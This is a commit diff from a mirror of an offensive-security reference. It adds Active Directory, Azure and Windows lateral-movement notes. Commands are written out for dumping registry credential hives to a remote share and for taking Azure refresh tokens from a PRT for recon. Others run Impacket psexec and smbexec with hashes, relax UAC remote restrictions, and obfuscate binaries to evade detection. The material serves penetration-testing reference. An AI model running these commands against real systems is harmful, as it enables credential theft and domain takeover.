ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

SMBExec + Refresh & Access Token Azure

Browse Source
This commit is contained in:
Swissky 2023-02-15 17:03:49 +01:00
parent 411f2455a9
commit 8442b304c9
3 changed files with 122 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Methodology and Resources/Active Directory Attack.md
View File

@ -2966,6 +2966,9 @@ This groups grants the following privileges :
$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
``` ```
* Retrieve SAM,SECURITY and SYSTEM hives
* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
### Abusing Active Directory ACLs/ACEs ### Abusing Active Directory ACLs/ACEs

118
Methodology and Resources/Cloud - Azure Pentest.md
View File

@ -3,6 +3,9 @@
## Summary ## Summary
* [Azure Recon Tools](#azure-recon-tools) * [Azure Recon Tools](#azure-recon-tools)
* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell)
* [Graph API Refresh Token](#graph-api-refresh-token)
* [Graph API Access Token](#graph-api-access-token)
* [Terminology](#terminology) * [Terminology](#terminology)
* [Training](#training) * [Training](#training)
* [Enumeration](#enumeration) * [Enumeration](#enumeration)
@ -60,35 +63,6 @@
## Azure Recon Tools ## Azure Recon Tools
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
```powershell
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
```powershell ```powershell
# First, retrieve a refresh token (-r) if username/password isn't supported. # First, retrieve a refresh token (-r) if username/password isn't supported.
@ -98,6 +72,8 @@
$rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1]
# Second, launch azurehound collector # Second, launch azurehound collector
./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json
## Connects on your Azure account using the refresh token provided and the tenant of the account ## Connects on your Azure account using the refresh token provided and the tenant of the account
## and collects every possible objects in contoso.microsoft.com. Results are stored in json ## and collects every possible objects in contoso.microsoft.com. Results are stored in json
./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"
@ -141,13 +117,42 @@
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
``` ```
* [BloodHoundAD/BARK](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit * [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
```ps1 ```ps1
. .\BARK.ps1 . .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
``` ```
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
```powershell
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
```powershell ```powershell
@ -208,6 +213,59 @@
$ Create-Backdoor, Execute-Backdoor $ Create-Backdoor, Execute-Backdoor
``` ```
## Authenticating to the Microsoft Graph API in PowerShell
* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in)
| Name | GUID |
|----------------------------|--------------------------------------|
| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 |
| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 |
| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c |
### Graph API Refresh Token
Authenticating to the Microsoft Graph API in PowerShell
```ps1
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"resource" = "https://graph.microsoft.com" # Microsoft Graph API
}
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers=@{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
-Headers $Headers `
-Body $body
$authResponse
```
### Graph API Access Token
This request require getting the Refresh Token.
```ps1
$body=@{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $authResponse.device_code
}
$Tokens = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
-Headers $Headers `
-Body $body
$Tokens
```
## Terminology ## Terminology
> Basic Azure AD terminologies > Basic Azure AD terminologies

42
Methodology and Resources/Windows - Using credentials.md
View File

@ -11,6 +11,7 @@
* [Impacket](#impacket) * [Impacket](#impacket)
* [PSExec](#psexec) * [PSExec](#psexec)
* [WMIExec](#wmiexec) * [WMIExec](#wmiexec)
* [SMBExec](#smbexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -123,13 +124,13 @@ From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to
All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports.
The following table summarize the port used by each scripts. The following table summarize the port used by each scripts.
| Method | Port Used | | Method | Port Used | Admin Required |
|-------------|---------------------------------------| |-------------|---------------------------------------|----------------|
| psexec.py | tcp/445 | | psexec.py | tcp/445 | Yes |
| smbexec.py | tcp/445 | | smbexec.py | tcp/445 | No |
| atexec.py | tcp/445 | | atexec.py | tcp/445 | No |
| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | | dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No |
| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | | wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes |
* `psexec`: equivalent of Windows PSEXEC using RemComSvc binary. * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary.
```ps1 ```ps1
@ -153,15 +154,23 @@ The following table summarize the port used by each scripts.
wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
``` ```
To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
To prevent RID 500 from being able to WmiExec or PsExec, execute:
`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`
### PSExec ### PSExec
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb) Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))
Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe` Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`
Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`. Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.
You need to update the pipe name to match "Custom_communication" in the line 163 You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`. Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).
### WMIExec ### WMIExec
@ -169,6 +178,15 @@ Use a non default share `-share SHARE` to write the output to reduce the detecti
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
### SMBExec
It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).
It will create a new service every time we execute a command. It will also generate an Event 7045.
By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.
## RDP Remote Desktop Protocol ## RDP Remote Desktop Protocol
:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors. :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
@ -216,7 +234,6 @@ Abuse RDP protocol to execute commands remotely with the following commands;
``` ```
## Powershell Remoting Protocol ## Powershell Remoting Protocol
### Powershell Credentials ### Powershell Credentials
@ -339,5 +356,8 @@ PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
- [Impacket Remote code execution on Windows from Linux by Vry4n_ | Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) - [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
- [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf) - [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf)
- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol)
- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/)
- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/)